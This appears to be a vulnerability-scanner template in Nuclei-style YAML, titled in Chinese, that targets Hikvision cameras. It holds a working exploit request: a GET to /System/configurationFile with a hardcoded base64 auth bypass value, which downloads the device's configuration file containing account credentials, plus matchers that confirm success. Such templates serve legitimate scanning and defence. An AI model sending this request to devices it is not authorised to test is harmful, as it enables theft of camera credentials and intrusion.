id: hikvision-camera-bypass-configuration-file-download

info:
  name: 海康威视摄像头配置账号密码文件下载
  author: Master先生
  severity: high
  reference:
    - https://www.seebug.org/vuldb/ssvid-96469
  tags: hikvision,camera

requests:
  - method: GET
    path:
      - "{{BaseURL}}/System/configurationFile?auth=YWRtaW46MTEK"

    redirects: false

    max-size: 500
    matchers-condition: and
    matchers:
      - type: binary
        binary:
          - "51a6aa7aff8cb4e6f465b4ead320e53a"
      
      - type: word
        words:
          - "(((((((((((((((((((((((((((((((((((((((((((((((((("